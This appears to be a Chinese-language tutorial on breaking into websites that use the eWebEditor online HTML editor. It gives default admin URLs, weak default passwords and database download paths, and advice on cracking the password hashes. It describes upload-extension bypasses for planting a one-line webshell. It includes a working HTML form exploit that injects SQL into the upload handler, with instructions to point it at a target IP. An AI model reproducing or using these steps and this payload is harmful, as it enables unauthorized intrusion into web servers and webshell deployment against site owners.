[TOC] ### Ewebeditor編輯器： Ewebeditor是基于瀏覽器的、所見即所得的在線HTML編輯器。eWebEditor!已基本成為網站內容管理發布的必備工具！ ### Ewebeditor利用核心： > **默認后臺：** `www.xxxx.com/ewebeditor/admin_login.asp` **默認數據庫：** ewebeditor/db/ewebeditor.mdb? ? ? ? ? ? ●一定要修改，否則會被惡意下載 **默認賬號密碼：** admin /admin，admin888? ? ? ? ? ? ? ??●一定要修改，弱口令不安全 ### ewebeditor入侵過程： * * * 1. 首先訪問默認管理頁看是否存在 2.80以前,默認管理頁地址為ewebeditor/admin\_login.asp 以后版本為admin/login.asp(其他語言改后綴即可)? 2. 默認管理帳號密碼? 默認管理頁存在！我們就用帳號密碼登陸！默認帳號密碼為: admin/admin888?！常用的密碼還有admin，admin999，admin1，admin000之類的。 3. 默認數據庫地址 如果密碼不是默認的，就要嘗試下載數據庫得到管理員密碼！管理員的帳號密碼，都在`eWebEditor_System`表段里，`sys_UserName`,`Sys_UserPass`?都是md5加密的。 得到了加密密碼。可以去www.cmd5.com?等網站進行查詢！暴力這活好久不干了！也可以丟國外一些可以跑密碼的網站去跑! ~~~ #默認數據庫路徑為: ewebeditor/db/ewebeditor.mdb ? #常用數據庫路徑為：不同版本不一樣 ewebeditor/db/ewebeditor.asa? ewebeditor/db/ewebeditor.asp ewebeditor/db/#ewebeditor.asa? ewebeditor/db/#ewebeditor.mdb ewebeditor/db/ewebeditor.mdb ewebeditor/db/!@#ewebeditor.asp? ewebeditor/db/ewebeditor1033.mdb ~~~ 很多管理員常改.asp后綴，一般訪問.asp .asa?后綴的都是亂碼！可以用下載工具下載后改后綴為.mdb ### 漏洞基本利用步驟，以asp的2.1.6為例！ **登陸編輯器后臺以后** > 低版本ewebeditor不支持ie7.0以下版本訪問（ietest軟件模擬ie6.0上傳） #### **1、通過修改樣式上傳文件** * * * 選擇樣式管理，默認編輯器的默認樣式都不可以修改的。我們可以從任意樣式新建一個樣式，然后在圖片上傳添加可上傳后綴asa .cer .cdx等方便我們上次小馬兒。 **1、點擊樣式管理,然后新增樣式** **2、在圖片類型中加入以下類型：asa|cer|asp|aaspsp 然后點擊提交。** > asp后綴很可能過濾過了。但是我們可以用.aaspsp后綴來添加，這樣上傳文件正好被ewebeditor 吃掉asp后綴，剩下.asp 。 同樣，如果遇到一個管理員有安全意識的，從代碼里，把.asp .asa .cer .cdx 都完全禁止了，我們也可以用.asasaa 后綴來突破。 **3、然后在工具欄里新增工具** **4、在按鈕設置里新增"插入或修改圖片"，其他隨意。** **5、然后直接上傳一句話木馬“123.cer”，這里因為高版本瀏覽器不能正常顯示，所以切換了低版本的瀏覽器。** **6、點擊確定，上傳成功，之后，查看代碼，就能看到完整的地址，鏈接即可獲取webshll。** #### 2、文件上傳漏洞 * * * **ewebeditor asp版 2.1.6 上傳漏洞利用程序：** **1、將下面的POC保存為HTML文件，將IP改成目標ip** ~~~html <form action="http://127.0.0.1/e/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=100><br><br> <input type=submit value=Fuck> </form> ~~~ **2、然后打開文件，可以選擇文件上傳一句話木馬“123.cer”** **3、上傳成功后，會出現黑色報錯，然后我們點擊右鍵查看源代碼** **4、可以從源代碼中發現文件上傳成功，文件名為“2020811162147343.cer”** **5、然后連接該木馬，默認的文件路徑是** 192.x.x.x/uploadfile/2020811162147343.cer #### 3、目錄遍歷漏洞： 必須換成2.8.0才存在這個漏洞，使用../../來跳轉目錄。